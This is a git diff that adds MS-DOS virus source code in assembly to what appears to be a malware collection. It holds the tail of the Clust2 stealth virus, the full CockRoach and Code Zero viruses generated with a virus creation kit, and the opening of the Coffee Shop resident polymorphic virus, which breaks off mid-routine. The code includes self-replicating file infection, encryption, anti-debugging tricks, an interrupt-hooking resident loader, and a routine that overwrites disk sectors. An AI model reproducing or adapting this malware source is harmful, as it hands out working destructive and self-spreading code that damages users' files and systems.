buffer contains the 'MZ' signature and +; that the candidate file isn't larger than 65000 bytes, and if there are +; enough zeros in the EXE-header. If these contidions are met, Clust2 +; will convert the EXE file to a COM file and inserts it's code in the +; buffer, allowing the original write request to proceed. This way it +; evades critical errors. The Clust2 virus is also stealth and can't be +; detected with virus scanners or checksumming software if the virus is +; resident. File-length and date doesn't change regardless if Clust2 +; is resident. It's also a slighty polymorphic virus, mutating a few +; bytes in it's decryptor. A wildcarded string is needed to find it. +; The following text is encrypted within the +; virus: +; +; "[Clust2]" +; "JT / TridenT" +; +; The Clust2 virus not infect files on device driven units, like drives +; compressed with DoubleSpace. It will disinfect when copied to such a +; device. +; +; Sometimes it will issue a "sector not found" error when a file is +; copied to a disk drive. +; +; The Clust2 virus doesn't do anything besides replicating. +; + ORG 100H + +JUMPIE: JMP SHORT JUMPER + + ORG 180H + +JUMPER: CLC + MOV CX,DECRLEN +MORPH EQU $-2 +JASS: LEA SI,DECR +DECRYPT: XOR BYTE PTR [SI],0 +TRIG EQU $-1 +TRAG EQU $-2 +TROG: INC SI +TREG: LOOP DECRYPT + +DECR: MOV AX,3513H + INT 21H + MOV OLD13,BX + MOV OLD13[2],ES + MOV AX,ES:[BX] + CMP AX,0FC80H + JE EXIT + +DOINST: MOV AH,0DH + INT 21H + + MOV AX,CS + DEC AX + MOV DS,AX + CMP BYTE PTR DS:[0],'Z' + JNE EXIT +RESIT: SUB WORD PTR DS:[3],VIRPAR+19H + SUB WORD PTR DS:[12H],VIRPAR+19H + LEA SI,JUMPER + MOV DI,SI + MOV ES,DS:[12H] + MOV DS,CS + MOV CX,VIRLEN + REP MOVSB + + MOV AX,2513H + MOV DS,ES + LEA DX,NEW13 + INT 21H + + PUSH CS + POP ES + MOV BX,100H + MOV SP,BX + MOV AH,4AH + INT 21H + PUSH CS + POP DS + MOV BX,DS:[2CH] + MOV ES,BX + MOV AH,49H + INT 21H + + XOR AX,AX + MOV DI,1 +SEEK: DEC DI + SCASW + JNE SEEK + + LEA SI,DS:[DI+2] +EXEC: PUSH BX + PUSH CS + POP DS + MOV BX,OFFSET PARAM + MOV DS:[BX+4],CS + MOV DS:[BX+8],CS + MOV DS:[BX+12],CS + POP DS + PUSH CS + POP ES + + MOV DI,OFFSET FILENAME + PUSH DI + MOV CX,40 + REP MOVSW + PUSH CS + POP DS + + POP DX + + MOV AX,4B00H + INT 21H +EXIT: MOV AH,4DH + INT 21H + MOV AH,4CH + INT 21H + +OLD13 DW 0,0 + +ORG13: JMP D CS:[OLD13] + +NEW13: CMP AH,3 + JE CHECKEXE + CMP AH,2 + JNE ORG13 +DO: PUSHF + CALL D CS:[OLD13] + CMP ES:[BX],7EEBH + JNE ERROR + MOV ES:[BX],'ZM' + PUSH DI + PUSH CX + PUSH AX + + MOV CX,VIRLEN + XOR AX,AX + LEA DI,BX[80H] + REP STOSB + + POP AX + POP CX + POP DI +ERROR: IRET + +CHECKEXE: CMP ES:[BX],'ZM' + JNE ORG13 + + CMP W ES:BX[4],(65000/512) + JNB ORG13 + + PUSH AX + PUSH CX + PUSH SI + PUSH DI + PUSH DS + + PUSH ES + POP DS + LEA SI,BX[80H] + MOV DI,SI + MOV CX,VIRLEN +FIND0: LODSB + OR AL,AL + LOOPE FIND0 + OR CX,CX + JNE NO0 + + XOR AX,AX + MOV DS,AX + MOV AX,DS:[046CH] + PUSH CS + POP DS + TEST AH,1 + JZ NOLOOPFLIP + XOR B TREG,2 +NOLOOPFLIP: TEST AH,2 + JZ NOCLCFLIP + XOR B JUMPER,1 +NOCLCFLIP: + ADD AX,VIRLEN + SHR AX,1 + MOV W MORPH,AX + MOV B TRIG,AH + XOR B TRAG,1 + XOR B JASS,1 + XOR B TROG,1 + MOV CX,CRYPT + LEA SI,JUMPER + REP MOVSB + MOV CX,DECRLEN + LEA SI,DECR +CODEIT: LODSB + XOR AL,AH + STOSB + LOOP CODEIT + MOV DI,BX + MOV AX,07EEBH + STOSW + +NO0: POP DS + POP DI + POP SI + POP CX + POP AX + JMP ORG13 + + DB '[Clust2]' + +PARAM DW 0,80H,?,5CH,?,6CH,? + + DB 'JT / TridenT' + +FILENAME EQU $ +DECRLEN EQU $-DECR +CRYPT EQU DECR-JUMPER +VIRLEN EQU $-JUMPER +VIRPAR EQU ($-JUMPER)/16 + + + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <哪哪哪哪哪哪哪 +; 哪哪哪哪哪> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cocroach.asm b/MSDOS/Virus.MSDOS.Unknown.cocroach.asm new file mode 100644 index 00000000..bb704d14 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cocroach.asm @@ -0,0 +1,336 @@ +; COCROACH.ASM -- CockRoach Virus 1.0 +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Anonymous Caller + +virus_type equ 1 ; Overwriting Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near +flag: cmp dx,0 + xchg dx,ax + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov cx,0007h ; Do 7 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + mov bx,0001h ; First argument is 1 + mov si,0002h ; Second argument is 2 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl bx,1 ; Convert to word index + shl si,1 ; Convert to word index + mov ax,word ptr [bx + 03FEh]; Zero COM port address + xchg word ptr [si + 03FEh],ax; Put first value in second, + mov word ptr [bx + 03FEh],ax; and second value in first! + pop es ; Restore ES + + mov ax,0002h ; First argument is 2 + mov cx,0096h ; Second argument is 150 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) +trash_loop: int 026h ; DOS absolute write interrupt + dec ax ; Select the previous disk + cmp ax,-1 ; Have we gone too far? + jne trash_loop ; If not, repeat with new drive + sti ; Restore interrupts + + mov ax,04C00h ; DOS terminate function + int 021h +main endp + + + db 036h,0D6h,0D4h,0E6h,029h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,135 ; Allocate 135 bytes on stack + + mov byte ptr [bp - 135],'\' ; Start with a backslash + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 134] ; SI points to 64-byte buffer + int 021h + + call traverse_path ; Start the traversal + +traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful? + je done_searching ; If so then we're done + call found_subdir ; Otherwise copy the subdirectory + + mov ax,cs ; AX holds the code segment + mov ds,ax ; Set the data and extra + mov es,ax ; segments to the code segment + + xor al,al ; Zero AL + stosb ; NULL-terminate the directory + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 70] ; DX points to the directory + int 021h + + mov dx,offset com_mask ; DX points to "*.COM" + call find_files ; Try to infect a .COM file + jnc done_searching ; If successful the exit + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect an .EXE file + jnc done_searching ; If successful the exit + jmp short traversal_loop ; Keep checking the PATH + +done_searching: mov ah,03Bh ; DOS change directory function + lea dx,[bp - 135] ; DX points to old directory + int 021h + + cmp word ptr [path_ad],0 ; Did we run out of directories? + jne at_least_tried ; If not then exit + stc ; Set the carry flag for failure +at_least_tried: mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller +com_mask db "*.COM",0 ; Mask for all .COM files +exe_mask db "*.EXE",0 ; Mask for all .EXE files +search_files endp + +traverse_path proc near + mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment + xor di,di ; DI holds the starting offset + +find_path: mov si,offset path_string ; SI points to "PATH=" + lodsb ; Load the "P" into AL + mov cx,08000h ; Check the first 32767 bytes + repne scasb ; Search until the byte is found + mov cx,4 ; Check the next four bytes +check_next_4: lodsb ; Load the next letter of "PATH=" + scasb ; Compare it to the environment + jne find_path ; If there not equal try again + loop check_next_4 ; Otherwise keep checking + + mov word ptr [path_ad],di ; Save the PATH address for later + mov word ptr [path_ad + 2],es ; Save PATH's segment for later + ret ; Return to caller + +path_string db "PATH=" ; The PATH string to search for +path_ad dd ? ; Holds the PATH's address +traverse_path endp + +found_subdir proc near + lds si,dword ptr [path_ad] ; DS:SI points to the PATH + lea di,[bp - 70] ; DI points to the work buffer + push cs ; Transfer CS into ES for + pop es ; byte transfer +move_subdir: lodsb ; Load the next byte into AL + cmp al,';' ; Have we reached a separator? + je moved_one ; If so we're done copying + or al,al ; Are we finished with the PATH? + je moved_last_one ; If so get out of here + stosb ; Store the byte at ES:DI + jmp short move_subdir ; Keep transfering characters + +moved_last_one: xor si,si ; Zero SI to signal completion +moved_one: mov word ptr es:[path_ad],si; Store SI in the path address + ret ; Return to caller +found_subdir endp + + db 010h,08Eh,0B5h,016h,002h + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 0FDh,052h,0B3h,06Ah,08Ch + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes? + jne infection_done ; If it is then exit + + cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM? + je infection_done ; If it is then skip it + + cmp word ptr [si + 01Ah],(finish - start) + jb infection_done ; If it's too small then exit + + mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,4 ; CX holds bytes to read (4) + mov dx,offset buffer ; DX points to buffer + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + push si ; Save DTA address before compare + mov si,offset buffer ; SI points to comparison buffer + mov di,offset flag ; DI points to virus flag + mov cx,4 ; CX holds number of bytes (4) + rep cmpsb ; Compare the first four bytes + pop si ; Restore DTA address + je infection_done ; If equal then exit + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +buffer db 4 dup (?) ; Buffer to hold test data +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "CockRoach 1.0 Virus" + db "By Anonymous Caller" + db "[LegenD] Systems 1992!" + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.codezero.asm b/MSDOS/Virus.MSDOS.Unknown.codezero.asm new file mode 100644 index 00000000..23010d9c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.codezero.asm @@ -0,0 +1,381 @@ +; CODEZERO.ASM -- Code Zero Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Nowhere Man + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + lea bx,[di + null_vector] ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + call search_files ; Find and infect a file + + call infected_all + or ax,ax ; Did the function return zero? + jne skip00 ; If not equal, skip effect + jmp short strt00 ; Success -- skip jump +skip00: jmp end00 ; Skip the routine +strt00: lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + +end00: +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + + db 064h,06Dh,056h,0D5h,05Dh + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + db 0D9h,013h,047h,056h,001h + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 005h,083h,072h,0C1h,006h + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + + db 06Ah,025h,0C8h,0A7h,094h + +infected_all proc near +if virus_type eq 0 + mov al,byte ptr [di + set_carry] +else + mov al,byte ptr [set_carry] ; AX holds success value +endif + cbw ; Sign-extend AL into AX + ret ; Return to caller +infected_all endp + +data00 db 7,7,7,"** CODE ZERO **",13,10,0 + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "[Code Zero]",0 + db "Nowhere Man, [NuKE] '92",0 + +encrypt_code proc near + push bp ; Save BP + mov bp,di ; Use BP as pointer to code + lea si,[bp + encrypt_decrypt]; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 9],dx ; Low word of timer is new key + + xor byte ptr [si + 1],8 ; + xor byte ptr [si + 8],1 ; Change all SIs to DIs + xor word ptr [si + 11],0101h; (and vice-versa) + + lea di,[bp + finish] ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + lea si,[bp + write_stuff] ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + lea dx,[bp + start] ; DX points to virus + + lea si,[bp + finish] ; SI points to routine + call si ; Encrypt/write/decrypt + + mov di,bp ; DI points to virus again + pop bp ; Restore BP + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + lea si,[bp + start_of_code] ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.coffshop.asm b/MSDOS/Virus.MSDOS.Unknown.coffshop.asm new file mode 100644 index 00000000..323049f1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.coffshop.asm @@ -0,0 +1,1662 @@ + .RADIX 16 + + +_TEXT segment + + assume cs:_TEXT, ds:_TEXT + + +VERSION equ 3 +PICLEN equ last - beeld ;length of picture routine +FILELEN equ last - first ;length of virus +FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs +VIRPAR equ 00D0 ;space for resident virus +WORKPAR equ 0160 ;work space for engine +STACKOFF equ 1000 ;Stack offset +DATAPAR equ 0050 ;extra memory allocated +BUFLEN equ 1C ;length of buffer + + +;**************************************************************************** +;* data area for virus +;**************************************************************************** + + org 00E0 + +mutstack dw 0, 0 +oldlen dw 0, 0 +oi21 dw 0, 0 +minibuf db 0, 0, 0, 0 + + +;**************************************************************************** +;* data area for engine +;**************************************************************************** + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +flags db 0 + + +;****************************************************************************** +;* Begin of virus, installation in memory +;****************************************************************************** + + org 0100 + +first: call next ;get IP +next: pop si + + sub si,low 3 ;SI = begin virus + mov di,0100 + cld + + push ax ;save registers + push ds + push es + push di + push si + + mov ah,30 ;DOS version >= 3.1? + int 21 + xchg ah,al + cmp ax,030A + jb not_install + + mov ax,33DA ;already resident? + int 21 + cmp ah,0A5 + je not_install + + mov ax,es ;adjust memory-size + dec ax + mov ds,ax + xor bx,bx + cmp byte ptr [bx],5A + jne not_install + mov ax,[bx+3] + sub ax,(VIRPAR+WORKPAR) + jb not_install + mov [bx+3],ax + sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) + + mov es,[bx+12] ;copy program to top + push cs + pop ds + mov cx,FILELEN + rep movsb + + push es + pop ds + + mov ax,3521 ;get original int21 vector + int 21 + mov ds:[oi21],bx + mov ds:[oi21+2],es + + mov dx,offset ni21 ;install new int21 handler + mov ax,2521 + int 21 + + mov ax,33DBh ;init. random nr. generator + int 21 + + mov ah,2A ;ask date + int 21 + cmp al,5 ;friday ? + jne not_install + mov ah,2C ;ask time + int 21 + or dh,dh ;sec = 0 ? + jnz not_install + + mov ax,33DC ;show picture + int 21 + +not_install: pop si ;restore registers + pop di + pop es + pop ds + pop ax + + add si,(offset buffer) + sub si,di + cmp byte ptr cs:[si],4Dh ;COM or EXE ? + je entryE + +entryC: push di + mov cx,BUFLEN + rep movsb + ret + +entryE: mov bx,ds ;calculate CS + add bx,low 10 + mov cx,bx + add bx,cs:[si+0E] + cli ;restore SS and SP + mov ss,bx + mov sp,cs:[si+10] + sti + add cx,cs:[si+16] + push cx ;push new CS on stack + push cs:[si+14] ;push new IP on stack + db 0CBh ;retf + + +;****************************************************************************** +;* Interupt 24 handler +;****************************************************************************** + +ni24: mov al,3 ;to avoid 'Abort, Retry, ...' + iret + + +;****************************************************************************** +;* Interupt 21 handler +;****************************************************************************** + +ni21: pushf + + cmp ax,33DA ;install-check ? + jne not_ic + mov ax,0A500+VERSION ;return a signature + popf + iret + +not_ic: push es ;save registers + push ds + push si + push di + push dx + push cx + push bx + push ax + + cmp ax,33DBh ;rnd init ? + jne not_ri + call rnd_init + jmp short no_infect + +not_ri: cmp ax,33DC ;show picture? + je show_pic + +not_pi: cmp ax,4B00 ;execute ? + je do_it + + cmp ax,6C00 ;open DOS 4.0+ ? + jne no_infect + test bl,3 + jnz no_infect + mov dx,di + +do_it: call infect + +no_infect: pop ax ;restore registers + pop bx + pop cx + pop dx + pop di + pop si + pop ds + pop es + popf + +org21: jmp dword ptr cs:[oi21] ;call to old int-handler + + +;****************************************************************************** +;* Show picture +;****************************************************************************** + +show_pic: mov ax,offset no_infect ;push return adres on stack + push cs + push ax + + mov di,((VIRPAR*10)+0100) ;move picture routine + mov si,offset beeld + mov cx,PICLEN + push cs + pop ds + push cs + pop es + rep movsb + + mov ax,cs ;calculate segment registers + add ax,low VIRPAR + mov ds,ax + mov es,ax + + push ax ;push picture adres on stack + mov ax,0100 + push ax + + db 0CBh ;(retf) goto picture routine + + +;****************************************************************************** +;* Tries to infect the file +;****************************************************************************** + +infect: cld + + push cs ;copy filename to CS:0000 + pop es + mov si,dx + xor di,di + mov cx,0080 +namemove: lodsb + cmp al,0 + je moved + cmp al,'a' + jb char_ok + cmp al,'z' + ja char_ok + xor al,20 ;convert to upper case +char_ok: stosb + loop namemove +return0: ret + +moved: stosb ;put last zero after filename + lea si,[di-5] + push cs + pop ds + + lodsw ;check extension .COM or .EXE + cmp ax,'E.' + jne not_exe + lodsw + cmp ax,'EX' + jmp short check + +not_exe: cmp ax,'C.' + jne return0 + lodsw + cmp ax,'MO' +check: jne return0 + + std ;find begin of filename + mov cx,si + inc cx +searchbegin: lodsb + cmp al,':' + je checkname + cmp al,'\' + je checkname + loop searchbegin + dec si + +checkname: cld ;check filename + lodsw + lodsw + mov di,offset names + mov cl,13 + repnz scasw + je return0 + + mov ax,3300 ;get ctrl-break flag + int 21 + push dx ;save flag on stack + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524 ;get int24 vector + int 21 + push es ;save vector on stack + push bx + + push cs + pop ds + + mov dx,offset ni24 ;install new int24 handler + mov ah,25 + push ax + int 21 + + mov ax,4300 ;ask file-attributes + cwd + int 21 + push cx ;save attributes on stack + + xor cx,cx ;clear attributes + mov ax,4301 + push ax + int 21 + jc return1v + + mov ax,3D02 ;open the file + int 21 + jnc opened +return1v: jmp return1 + +opened: xchg ax,bx ;save handle + + mov ax,5700 ;get file date & time + int 21 + push dx ;save date & time on stack + push cx + + mov cx,BUFLEN ;read begin of file + mov si,offset buffer + mov dx,si + call 